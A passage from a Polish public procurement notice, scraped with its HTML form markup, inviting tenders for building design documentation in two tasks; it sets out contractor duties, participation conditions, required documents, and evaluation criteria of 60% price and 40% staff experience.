dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U.2012 poz. 462 ze zm.).7/	Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych (Dz. U. 2012 poz. 463 ze zm.).3.Realizacja przedmiotu zamówienia musi być dokonana w stopniu i złożoności odpowiadającej aktualnie obowiązującym przepisom prawa, w szczególności prawa budowlanego i prawa zamówień publicznych (bez użycia nazw własnych, wskazań na określony produkt, czy producenta itp. przy opisach przedmiotu zamówienia), niezbędnym do przygotowania postępowań przetargowych dotyczących przyszłej realizacji projektu, a ponadto Wykonawca będzie zobowiązany również do niezwłocznego udzielania odpowiedzi na pytania potencjalnych wykonawców w postępowaniach przetargowych dotyczących realizacji projektu i wszelkich niezbędnych konsultacji z tym związanych, odpowiednio w odniesieniu od jednej do dwudziestu części zamówienia4. Ponadto Wykonawca zobowiązany jest w szczególności do:a)	przekazania do Zamawiającego do 3 dni od daty uzyskania ostatecznej decyzji lub zaświadczenia o braku sprzeciwu, oraz wszelkich pozyskanych uzgodnień, opinii, warunków itp., b)	przed złożeniem wniosku o wydanie decyzji administracyjnych Wykonawca zobowiązany jest uzyskać uzgodnienie dokumentacji od Zamawiającego;c)	przekazania i odbioru przedmiotu zamówienia odbędzie się na podstawie protokołu zdawczo-odbiorczego którego nieodłączną częścią będzie zestawienie opracowań i pozyskanych warunków, opinii, uzgodnień i decyzji oraz oświadczenia Projektanta o kompletności projektu oraz o tym, że projekt został wykonany zgodnie z umową, obowiązującymi przepisami, normami i jest kompletny z punktu widzenia celu, któremu ma służyć. Ponadto, do projektu należy dołączyć oświadczenie Projektanta, że wszystkie uwagi wniesione na etapie opracowania projektów zostały w nim uwzględnione;d)	poniesienia wszelkich opłat za pozyskane decyzje, uzgodnienia i opinie itp.,e)	udzielania odpowiedzi do Zamawiającego w ciągu 24 godzin, w razie zapytań Wykonawców w trakcie prowadzonego postępowania przetargowego na realizację robót, gdyż Wykonawca odpowiada za kompletność i prawidłowość dokumentacji oraz zgodność przedmiaru z projektem.5.Wykonawca jest zobowiązany opracować i przekazać Zamawiającemu wykonaną dokumentację projektową, stanowiącą przedmiot umowy w formie papierowej w ilości: 4 egzemplarzy Projektu Budowlanego i 4 egzemplarze Projektu Wykonawczego oraz w wersji elektronicznej.6.Dokumentację stanowiącą przedmiot zamówienia zgłoszoną do odbioru, Wykonawca zaopatrzy w wykaz opracowań oraz pisemne oświadczenie, że dokumentacja jest wykonana zgodnie z umową, obowiązującymi przepisami techniczno — budowlanymi w stanie zupełnym (kompletna z punktu widzenia celu, któremu ma służyć). Wykaz opracowań i pisemne oświadczenie stanowić będą integralną część wykonanego przedmiotu umowy.8. Zamawiający nie stawia wymagań, o których mowa w art. 29 ust. 3a ustawy Pzp, tj. dotyczących zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2016 r. poz. 1666 z późn. zm.)</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">71220000-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Zadanie nr 1 - 30.06.2021rZadanie nr 2 - 31.12.2020r. </span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zadanie nr 1 1.1.1Warunek ten zostanie spełniony jeżeli Wykonawca wykaże wykonanie - w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 2 usługi polegające na wykonaniu dokumentacji projektowej na budowę, przebudowę lub rozbudowę obiektu kubaturowego o kubaturze minimum 2.000 m³1.1.2.Warunek ten zostanie spełniony jeżeli Wykonawca wykaże dysponowanie minimum: - 1 osobą posiadającą uprawnienia do projektowania w specjalności architektonicznej - 1 osobą posiadającą uprawnienia do projektowania w specjalności konstrukcyjno- budowlanej - 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji sanitarnej.- 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji elektrycznych - 1 osobą posiadającą uprawnienia do projektowania w specjalności drogowej Zadanie nr 21.1.1.Warunek ten zostanie spełniony jeżeli Wykonawca wykaże wykonanie - w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 2 usługi polegające na wykonaniu dokumentacji projektowej na budowę, przebudowę lub rozbudowę obiektu kubaturowego o kubaturze minimum 500 m³1.1.2.Warunek ten zostanie spełniony jeżeli Wykonawca wykaże dysponowanie minimum: - 1 osobą posiadającą uprawnienia do projektowania w specjalności architektonicznej - 1 osobą posiadającą uprawnienia do projektowania w specjalności konstrukcyjno- budowlanej - 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji sanitarnej.- 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji elektrycznych - 1 osobą posiadającą uprawnienia do projektowania w specjalności drogowej W przypadku złożenia oferty na 2 części zamówienia - za spełnienie warunku dla obu części Zamawiający uzna wykazanie się przez Wykonawcę wykonaniem co najmniej 2 usług (zamówień) o kubaturze równej lub większej od najwyższej wymaganej kubatury spośród części, na które Wykonawca składa ofertę.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentu, o których mowa powyżej., zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osobyDokumenty/oświadczenia powinny być wystawione nie wcześniej niż 6 miesięcy przed upływemskładania ofert.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1 Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami – na formularzu zgodnym z treścią załącznika Nr 4 do specyfikacji. 2 Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których usługi te były wykonywane, oraz z załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie –na formularzu zgodnym z treścią załącznika nr 5 do specyfikacji3.Dowody określające czy usługi wskazane w wykazie zostały wykonane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego usługi były wykonane a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Zawartość oferty.Formularz „OFERTA” – załącznik nr 1 do SIWZPełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów dołączonych do oferty złożone w oryginale lub kopiipoświadczonej notarialnieOświadczenia wymagane postanowieniami Rozdziału VIII ust. 1 SIWZ </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>najniższa cena </TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>doswiadczenie osób skierowanych do realizacji zamówienia </TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.Zamawiający przewiduje możliwość zmiany terminu wykonania Przedmiotu umowy w przypadku:a).skomplikowanego charakteru opracowania, tj. np: braku w dokumentacji uzbrojenia terenu wszystkich mediów przebiegających pod projektowaną inwestycją;b).przedłużających się uzgodnień branżowych, co jest podstawą do zakończenia opracowania dokumentacji projektowej i wystąpienia o pozwolenie na budowę.c).wystąpienia konieczności zmiany osób koordynujących (osób odpowiedzialnych za realizację) ze strony wykonawcy lub ze strony Zamawiającego;d).zmiany projektantów, pod warunkiem spełniania przez nowe osoby warunków opisanych w SIWZe).zmiany terminu/ów realizacji przedmiotu umowy, poprzez jego skrócenie w przypadku zgodnej woli Stron, lub poprzez jego przedłużenie ze względu na przyczyny leżące po stronie Zamawiającego dotyczące w szczególności braku udostępnienia 